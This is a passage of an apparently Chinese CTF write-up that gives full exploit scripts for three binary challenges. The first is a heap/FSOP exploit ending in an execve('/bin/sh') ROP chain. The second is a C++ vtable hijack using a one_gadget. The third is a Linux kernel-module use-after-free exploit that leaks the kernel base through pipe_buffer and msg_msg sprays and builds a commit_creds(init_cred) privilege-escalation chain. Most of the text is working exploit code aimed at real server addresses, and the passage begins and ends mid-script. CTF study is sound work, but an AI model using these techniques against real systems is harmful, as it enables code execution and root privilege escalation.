#b += "b *$rebase(0x353A)\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('122.9.149.82','9999')

def debug():
#gdb.attach(p,"")
gdb.attach(p,"b *$rebase(0x357C)\nb *$rebase(0x353A)\n")
#pause()

def cmd(op):
sla(">",str(op))

def register(uid,len,name,passwd="a"):
payload = "GET /register?uid={}&len={})&username={}&password={}".format(uid,str(len),name,passwd)
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

def logoff(name,passwd="a"):
payload = "GET /logoff?username={}&password={}".format(name,passwd)
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

def show(name,passwd,fd):
payload = "GET /show?username={}&password={}".format(name,passwd)
sl(payload)
payload = "Stdout: "+str(fd)
sl(payload)
sl("")

def setlocale_s(locale_setting):
payload = "GET /setlocale?locale={}".format(locale_setting)
sl(payload)
sl("")

def note(name,passwd,buffer,size):
payload = "POST /note?username={}&password={}".format(name,passwd)
sl(payload)

sleep(0.1)
payload = "Content-Length: "+str(size)
sl(payload)
sl("")

pause()
p.send(buffer)

backdook = 0x2562

for i in range(0x20):
register(i,64,str(i))

for i in range(0x1f):
logoff(str(i))

register(1,1024,"1")

payload = "GET /init"
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

seed = lib.time(0)
lib.srand(seed)
pswd = ""

for i in range(13):
num = lib.rand() % 0x100
while(num >= 0x7f or num <= 0x20):
num = lib.rand() % 0x100
print(hex(num))
pswd += chr(num)
success(pswd)

show("root",pswd,1)

ru("Content-type: text/html")
leak_addr = u64(ru("\x7f")[-5:].ljust(8,b"\x00"))+0x7f*0x10000000000
libc_base = leak_addr - 0x1f72d0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

strlen_got = libc_base + 0x1f6080
remaloc_got = libc_base + 0x1f6010
binsh = libc_base + 0x1b51d2
system = libc_base + libc.sym["system"]
execve = libc_base + libc.sym["execve"]
one_gadgets = [0x4e880,0xe3199,0xe31f3]
one_gadget = libc_base + one_gadgets[2]
_IO_list_all = libc_base + libc.sym["_IO_list_all"]
setcontext=libc_base+libc.sym['setcontext']

success("remaloc_got >> "+hex(remaloc_got))
success("_IO_list_all >> "+hex(_IO_list_all))
success("system >> "+hex(system))

setlocale_s("en_GB.UTF-8")
register(1000,64,"a"*8,passwd="b"*0xd)
register(1000,64,"a"*8,passwd="b"*0xd)
register(1000,256,"a"*8,passwd="b"*0xd)
register(1000,64,"c"*8,passwd="d"*0xd)
register(1000,64,"e"*8,passwd="f"*0xd)

logoff("e"*8,passwd="f"*0xd)
register(1000,16,"a"*8,passwd="b"*0xd)
register(1,64,"yyy",passwd="a:0")

logoff("yyy")
show("yyy","a",2)

ru(b"Content-type: text/html\r\n")
ru(b"\r\n")
leak_addr = u64(p.recv(5).ljust(8,b"\x00"))
heap_base = leak_addr*0x1000-0x2000
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

register(1,64,"yyy",passwd="a:0")
logoff("31")
logoff("yyy")

key = (heap_base+0x2200)>>12
payload = p64(_IO_list_all ^ key)
note("yyy","a",payload,16)

register(1,1024,"e"*8,passwd="a:0")
register(1,64,"yyy",passwd="a:0")

_IO_wfile_jumps = libc_base + libc.sym["_IO_wfile_jumps"]

next_chain = 1
fake_io_addr = heap_base + 0x22b0
payload_addr = heap_base + 0x23c8
flag_addr = heap_base + 0x23c8
socket_addr = heap_base + 0x2538

pop_rax_ret = libc_base + 0x0000000000040123
pop_rdi_ret = libc_base + 0x00000000000240e5
pop_rsi_ret = libc_base + 0x000000000002573e
pop_rdx_ret = libc_base + 0x0000000000026302
syscall_ret = libc_base + 0x00000000000e3559

fake_IO_FILE = b"./flag\x00".ljust(8,b"\x00") #_flags=rdi
fake_IO_FILE += p64(0)*7
fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE += p64(payload_addr-0xa0)#_IO_backup_base=rdx
fake_IO_FILE += p64(setcontext+61)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x68, b'\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, b'\x00')
fake_IO_FILE += p64(flag_addr) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, b'\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xd0, b'\x00')
fake_IO_FILE += p64(1)
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(_IO_wfile_jumps+0x30) # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr

payload = p64(flag_addr)

payload += p64(pop_rax_ret) + p64(59)
payload += p64(pop_rdi_ret) + p64(binsh)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)

socket_data = p64(0x8108a8c00a1a0002)

note("e"*8,"a",fake_IO_FILE+payload+socket_data,0x400)

payload = p64(fake_io_addr)*8
note("yyy","a",payload,64)
success("setcontext+61 >> "+hex(setcontext+61))
success("execve >> "+hex(execve))
success("libc_base >> "+hex(libc_base))

#debug()
#pause()

payload = "GET /poweroff"
sl(payload)
sl("")

#cat flag 1>&0

p.interactive()

tpgctask

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=964af918201c59dc08c1d903fa0bea90e91e87c9, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Partial RELRO,NX

入侵思路

本题目的代码非常复杂,但功能却比较简单,几番尝试就发现了问题:

1
2
3
4
5
6
7
Take_Ruby("a"*0x8)
Take_Rod("b"*0x500)
Fuse_Weapon("c"*0x10)
Drop_Weapon()
Drop_Ruby()
Take_Ruby("d"*0x8)
Fuse_Weapon("e"*0x10)
1
2
3
4
5
6
[Weapon info]:
------------------------------
Ruby: dddddddd
Rod: 0\xd6A\x00\x00\x00\x11\x00\x7f\x00X-A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb!\x00\x00\x00\x00\xc5\xd5\x00\x00\x00\xc6\xd5\x00\x00\x00\xc5\xd5\x00\x00\x00\x00\x00\x00\x00\xd6A\x00\x00\x00\x0b\x00\x7f\x00\x98.A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb\xb8.A\x00\x00\x00\xc7\xd5\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00bbbbbbb\xc0\xc6\xd5\x00\x00\x00\x00\x00\x00\x00bbbbbbbbbbbbbb\xe0\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb@\xd0\xd5\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00bbbbbbbbbbbbbbb!\x00\x00\x00\x00#\xd4\x00\x00H#\xd4\x00\x00P\xc6\xd5\x00\x00\x00\x05\x00\x00\x00\xd6A\x00\x00\x00\x11\x00\x7f\x00X-A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb!\x00\x00\x00\x00\xc5\xd5\x00\x00\x00\xc6\xd5\x00\x00\x00\xc5\xd5\x00\x00\x00\x00\x00\x00\x00\xd6A\x00\x00\x00\x0b\x00\x7f\x00X-A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb\xf8-A\x00\x00\xc7\xd5\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb!\x00\x00\x00\x00#\xd4\x00\x00H#\xd4\x00\x00P\xc6\xd5\x00\x00\x00\x05\x00\x00\x00\x11\xbf3\x7f\x00\x00\x96\xbf3\x7f\x000\xc7\xd5\x00\x00\x00\xc7\xd5\x00\x00\x00bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Fuse: eeeeeeeeeeeeeeee
------------------------------

可以发现:Ruby 的释放和重申请似乎影响了 Rod,可以先用 GDB 定位泄露数据的地址,然后定位可利用数据的位置,泄露 libc_base,heap_base,pro_base:

之后在尝试的过程中发现 Drop_Weapon 会导致 Drop_Rod 和 Drop_Ruby 可以再次执行(原本会被程序检查并制止),第二次调用析构函数的过程会导致其虚表发生错误,配合堆风水就可以劫持程序流程

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases around the pwntools tube `p` (created further down the script).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# lg takes the NAME of a variable, evaluates it, and logs it in colour.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad short leaks with NUL bytes before unpacking; the fill must be one byte.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b* 0x40a11b\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

def cmd(op):
sla(">",str(op))

def Take_Ruby(name):
cmd(1)
sla("new owner here:",name)

def Drop_Ruby():
cmd(2)

def Take_Rod(name):
cmd(3)
sla("new owner here:",name)

def Drop_Rod():
cmd(4)

def Fuse_Weapon(name):
cmd(5)
sla("new weapon here",name)

def Drop_Weapon():
cmd(6)

Take_Ruby("a"*0x8)
Take_Rod("b"*0x500)
Fuse_Weapon("c"*0x10)
Drop_Weapon()
Drop_Ruby()
Take_Ruby("d"*0x8)
Fuse_Weapon("e"*0x10)

ru("Rod: ")
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
pro_base = leak_addr - 0x1e630
success("leak_addr >> "+hex(leak_addr))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
success("leak_addr >> "+hex(leak_addr))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
success("leak_addr >> "+hex(leak_addr))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
heap_base = leak_addr - 0x2c618
success("leak_addr >> "+hex(leak_addr))

ru(p64(0x511))
ru(p64(0x511))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
libc_base = leak_addr - 0x1ec100

success("pro_base >> "+hex(pro_base))
success("heap_base >> "+hex(heap_base))
success("libc_base >> "+hex(libc_base))

one_gadgets = [0xe6aee,0xe6af1,0xe6af4]
one_gadget = libc_base + one_gadgets[0]
success("one_gadget >> "+hex(one_gadget))

#debug()
Drop_Ruby()
Take_Ruby(p64(heap_base+0x2ccd8))
Drop_Rod()
Take_Rod(p64(one_gadget))
Fuse_Weapon("e"*0x10)

cmd(6)
cmd(4)

p.interactive()

core

1
2
/ $ cat /proc/version 
Linux version 5.8.0 (vm@vm-pc) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Fri May 12 11:14:51 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh

qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 oops=panic panic=-1 pti=on" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2

insmod /baby.ko
chmod 666 /dev/baby

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

poweroff -d 0 -f

漏洞分析

题目的边界检查有问题,全局变量 heap_var.chunk_list[indext] 出现溢出并且可以覆盖 heap_var.use_list[indext]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
index = 0;
while ( 1 )
{
indext = index;
chunkt = heap_var.chunk_list[index];
if ( !chunkt )
break;
if ( (unsigned int)chunkt->key < key )
{
index = 2 * index + 1;
if ( index > 0xF )
goto LABEL_7;
}
else
{
index = 2 * index + 2;
if ( index > 0xF )
goto LABEL_7;
}
}
chunk = (Chunk *)kmem_cache_alloc(kmalloc_caches[6], 0xDC0LL, 0LL); /* kmalloc-64 */
--add_count;
heap_var.use_list[indext] = 1LL;
heap_var.chunk_list[indext] = chunk;
chunk->key = key;

程序通过 heap_var.use_list[indext] 判断 chunk 是否被 free,覆盖这里会导致 UAF

测试 Poc 如下:

1
2
3
4
5
6
add(0x400-0x40); // 0
add(0x400-0x30); // 1
add(0x400-0x20); // 3
add(0x400-0x10); // 7
dele(0);
add(0x400-0x0); // 15
1
2
3
4
5
6
7
8
9
10
11:0088│ 0xffffffffc0002480 —▸ 0xffff88800824dac0 ◂— 0x400
12:0090│ 0xffffffffc0002488 —▸ 0xffff88800824dcc0 ◂— 0x3d0
13:0098│ 0xffffffffc0002490 ◂— 0x0
14:00a0│ 0xffffffffc0002498 —▸ 0xffff88800824dc40 ◂— 0x3e0
15:00a8│ 0xffffffffc00024a0 ◂— 0x0
... ↓ 2 skipped
18:00c0│ 0xffffffffc00024b8 —▸ 0xffff88800824dd00 ◂— 0x3f0
19:00c8│ 0xffffffffc00024c0 ◂— 0x0
... ↓ 6 skipped
20:0100│ 0xffffffffc00024f8 —▸ 0xffff88800824dac0 ◂— 0x400

入侵思路

内核模块使用 kmalloc-64,存在 UAF 漏洞但利用有限制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
while ( 1 )
{
while ( 1 )
{
chunk = heap_var.chunk_list[index];
if ( !chunk )
return 0;
if ( (unsigned int)chunk->key >= size )
break;
index = 2 * index + 1;
if ( index > 0xF )
return 0;
}
if ( (unsigned int)chunk->key <= size )
break;
index = 2 * index + 2;
if ( index > 0xF )
return 0;
}

内核模块会匹配 chunk->key,因此用于占位的内核结构体的前2字节必须已知(当然也可以爆破)

此时 user_key_payload 结构体就是最好的选择:

1
2
3
4
5
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};
  • 在 rcu 锁触发前,user_key_payload->rcu_head 都不会被初始化
1
2
3
4
5
6
7
pwndbg> telescope 0xffff88800828e400
00:0000│ rdi r8 0xffff88800828e400 ◂— 0x400
01:0008│ 0xffff88800828e408 ◂— 0x0
02:0010│ 0xffff88800828e410 ◂— 0x20 /* ' ' */
03:0018│ 0xffff88800828e418 ◂— '22222222222222222222222222222222'
... ↓ 3 skipped
07:0038│ 0xffff88800828e438 ◂— 0x0
  • 此时可以通过 UAF 修改 user_key_payload->datalen 来完成泄露

泄露脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
add(0x400-0x40); // 0
add(0x400-0x30); // 1
add(0x400-0x20); // 3
add(0x400-0x10); // 7
dele(0);
add(0x400-0x00); // 15

dele(15);

memset(data, 0x32, sizeof(data));
key_id = key_alloc("11111111", data, 0x20);
if (key_id < 0)
err_exit("key_alloc error");

for (int i = 0; i < PIPE_NUM; i++){
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 1) < 0){
/* 1 * pipe_buffer = 0x30 kmalloc-64 */
err_exit("fcntl");
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_fd[i][1], "AAAAAAAA", 8); // tag
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "AAAAAAAA", 8);
write(pipe_fd[i][1], "BBBBBBBB", 8);
}

memset(data, 0, sizeof(data));
*(int *)&data[0x0] = 0x400; /* 修改chunk->key */
*(int *)&data[0x10] = 0x400; /* 修改user_key_payload->datalen */
edit(0x400,data);

int res = key_read(key_id, data, 0x400);
print_hex(data,sizeof(data));

index = -1;
for (int i = 0; i < sizeof(data)/8; i++){
if(*(uint64_t *)&data[i*8] >= 0x1800000000 && *(uint64_t *)&data[i*8] <= 0x3800000000){
index = i*8;
break;
}
}
if(index == -1){
err_exit("scan");
}

pipe_page_addr = *(uint64_t *)&data[index-8];
pipe_ops_addr = *(uint64_t *)&data[index+8];
printf("pipe_page_addr: 0x%lx\n",pipe_page_addr);
printf("pipe_ops_addr: 0x%lx\n",pipe_ops_addr);

kernel_offset = pipe_ops_addr - 0xffffffff81a0ec80;
kernel_base = 0xffffffff81000000 + kernel_offset;
printf("kernel_offset: 0x%lx\n",kernel_offset);
printf("kernel_base: 0x%lx\n",kernel_base);

接下来将 pipe_buffer 释放掉,重新填充 msg_msg 并泄露 msg_msg->list_head

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(uint64_t *)&primary_msg.mtext[0] = 0xffffffff81155279 + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(uint64_t *)&secondary_msg.mtext[0] = pipe_ops_addr;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if(i < PIPE_NUM){
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}
}

memset(data, 0, sizeof(data));
*(int *)&data[0x0] = 0x400; /* 修改chunk->key */
*(int *)&data[0x10] = 0x400; /* 修改user_key_payload->datalen */
edit(0x400,data);

res = key_read(key_id, data, 0x400);
print_hex(data,sizeof(data));

index = -1;
for (int i = 0; i < sizeof(data)/8; i++){
if(*(uint64_t *)&data[i*8] == pipe_ops_addr){
index = i*8;
break;
}
}
if(index == -1){
err_exit("scan");
}

msg_addr = *(uint64_t *)&data[index-8*5];
victim_addr = msg_addr + 0x30;
printf("msg_addr: 0x%lx\n",msg_addr);
printf("victim_addr: 0x%lx\n",victim_addr);

最后就可以劫持 pipe_buffer

先释放 user_key_payload 部署 pipe_buffer,由于我们泄露了 msg_msg->list_head,因此我们可以直接将 pipe_buf_operations 伪造在 msg_msg 中(地址已知)

利用 SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 绕过 pti,并提权(由于本题目没有给符号,因此相关地址需要使用 bindiff 进行推测)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

/* Number of pipes and System V message queues created by the spray loops. */
#define PIPE_NUM 0x20
#define MSG_QUEUE_NUM 0x20
/*
 * Size budget for each message: the mtext arrays below are declared as
 * <size> - sizeof(struct msg_msg).
 * The expansions are parenthesized so the macros evaluate correctly when
 * used inside a larger expression (e.g. PRIMARY_MSG_SIZE * 2).
 */
#define PRIMARY_MSG_SIZE (0x100-0x10)
#define SECONDARY_MSG_SIZE (0x40-0x10)

/* mtype values passed to write_msg()/read_msg() for the two message kinds. */
#define PRIMARY_MSG_TYPE 0x31
#define SECONDARY_MSG_TYPE 0x32

/* File descriptor of /dev/baby; set in main() and used by every ioctl wrapper below. */
int fd;
/*
 * Argument block handed to the driver through ioctl().
 * The wrappers below fill key2 (and sometimes key/data); c is never set by them.
 * NOTE(review): the field meanings are defined by the driver, which is not
 * visible here -- confirm against the driver source.
 */
struct argg {
size_t key;
size_t key2;
char* data;
size_t c;
};

int add(int key2){
struct argg arg = {.key2 = key2};
return ioctl(fd, 0x1001, &arg);
}

int dele(int index){
struct argg arg = {.key2 = index};
return ioctl(fd, 0x1003, &arg);
}

int edit(int key2,char *data){
struct argg arg = {.key2 = key2, .data = data};
return ioctl(fd, 0x1002, &arg);
}

int func(int key, int key2, char *data){
struct argg arg = {.key = key, .key2 = key2, .data = data};
return ioctl(fd, 0x2333, &arg);
}

/*
 * User-side buffer for the "primary" message of each queue.
 * mtext is sized so that sizeof(struct msg_msg) + sizeof(mtext) equals
 * PRIMARY_MSG_SIZE (struct msg_msg presumably comes from kernelpwn.h).
 */
struct
{
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

/*
 * User-side buffer for the "secondary" message of each queue, sized the same
 * way against SECONDARY_MSG_SIZE.
 */
struct
{
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

/*
 * Entry point of the /dev/baby exploit.
 *
 * Stages, in order:
 *   1. open the device, create PIPE_NUM pipes and MSG_QUEUE_NUM message queues;
 *   2. shape the heap with add()/dele(), allocate a key, resize and fill the pipes;
 *   3. overwrite two length fields through edit(), read the key back and scan
 *      the dump for pipe_buffer-looking data to derive the kernel offset;
 *   4. place the ROP chain in the primary messages, send primary + secondary
 *      messages, close the first pipes, and scan a second key dump for the
 *      marker to learn a message address;
 *   5. drain the secondary messages, revoke the key, spray pipes again,
 *      overwrite with a forged pipe_buffer and close the pipes to trigger it.
 *
 * Statement order is kept exactly as in the original because the heap layout
 * depends on it. The only functional change: the two scan loops no longer
 * consider slots whose neighbouring qwords (read afterwards) would lie outside
 * data[].
 *
 * Helpers such as save_status(), key_alloc(), write_msg() and the globals
 * kernel_offset/kernel_base come from kernelpwn.h, which is not shown here.
 */
int main(int argc , char **argv, char **envp)
{
    char data[0x400];
    int key_id;
    int index;
    int pipe_fd[PIPE_NUM*10][2];
    int msqid[MSG_QUEUE_NUM];
    uint64_t pipe_page_addr,pipe_ops_addr;
    uint64_t victim_addr,msg_addr;
    uint64_t *rop_chain;
    int rop_idx;

    save_status();
    bind_core(0);
    unshare_setup();

    fd = open("/dev/baby", O_RDWR);
    if (fd < 0)
        err_exit("open /dev/baby");

    for (int i = 0; i < PIPE_NUM; i++){
        if (pipe(pipe_fd[i]) < 0)
            err_exit("FAILED to spary pipe");
    }

    for (int i = 0; i < MSG_QUEUE_NUM; i++){
        if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
            err_exit("failed to create msg_queue!");
    }

    /* Heap shaping through the driver; the trailing numbers are the author's slot indices. */
    add(0x400-0x40); // 0
    add(0x400-0x30); // 1
    add(0x400-0x20); // 3
    add(0x400-0x10); // 7
    dele(0);
    add(0x400-0x00); // 15

    dele(15);

    memset(data, 0x32, sizeof(data));
    key_id = key_alloc("11111111", data, 0x20);
    if (key_id < 0)
        err_exit("key_alloc error");

    for (int i = 0; i < PIPE_NUM; i++){
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 1) < 0){
            /* 1 * pipe_buffer = 0x30 kmalloc-64 */
            err_exit("fcntl");
        }
    }

    for (int i = 0; i < PIPE_NUM; i++){
        write(pipe_fd[i][1], "AAAAAAAA", 8); // tag
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], "AAAAAAAA", 8);
        write(pipe_fd[i][1], "BBBBBBBB", 8);
    }

    memset(data, 0, sizeof(data));
    *(int *)&data[0x0] = 0x400; /* overwrite chunk->key */
    *(int *)&data[0x10] = 0x400; /* overwrite user_key_payload->datalen */
    edit(0x400,data);

    int res = key_read(key_id, data, 0x400);
    print_hex(data,sizeof(data));

    /*
     * Look for a qword in [0x1800000000, 0x3800000000]; the qwords right
     * before and after it are then taken as the pipe_buffer page and ops
     * pointers. Slot 0 and the last slot are skipped because one of those
     * neighbours would fall outside data[].
     */
    index = -1;
    for (size_t i = 1; i + 1 < sizeof(data)/8; i++){
        if(*(uint64_t *)&data[i*8] >= 0x1800000000 && *(uint64_t *)&data[i*8] <= 0x3800000000){
            index = (int)(i*8);
            break;
        }
    }
    if(index == -1){
        err_exit("scan");
    }

    pipe_page_addr = *(uint64_t *)&data[index-8];
    pipe_ops_addr = *(uint64_t *)&data[index+8];
    printf("pipe_page_addr: 0x%lx\n",pipe_page_addr);
    printf("pipe_ops_addr: 0x%lx\n",pipe_ops_addr);

    kernel_offset = pipe_ops_addr - 0xffffffff81a0ec80;
    kernel_base = 0xffffffff81000000 + kernel_offset;
    printf("kernel_offset: 0x%lx\n",kernel_offset);
    printf("kernel_base: 0x%lx\n",kernel_base);

    memset(&primary_msg, 0, sizeof(primary_msg));
    memset(&secondary_msg, 0, sizeof(secondary_msg));

    /* The ROP chain lives in the primary message body, right after the first qword. */
    rop_idx = 0;
    rop_chain = (uint64_t*) &primary_msg.mtext[8];
    rop_chain[rop_idx++] = kernel_offset + 0xffffffff8102ae6d; // pop_rdi_ret
    /* offset obtained by diffing against look_up_user_keyrings */
    rop_chain[rop_idx++] = kernel_offset + 0xFFFFFFFF81C33060; // INIT_CRED
    rop_chain[rop_idx++] = kernel_offset + 0xFFFFFFFF8106E4F0; // COMMIT_CREDS
    /* search -t qword 0x5c415d415e415f41 */
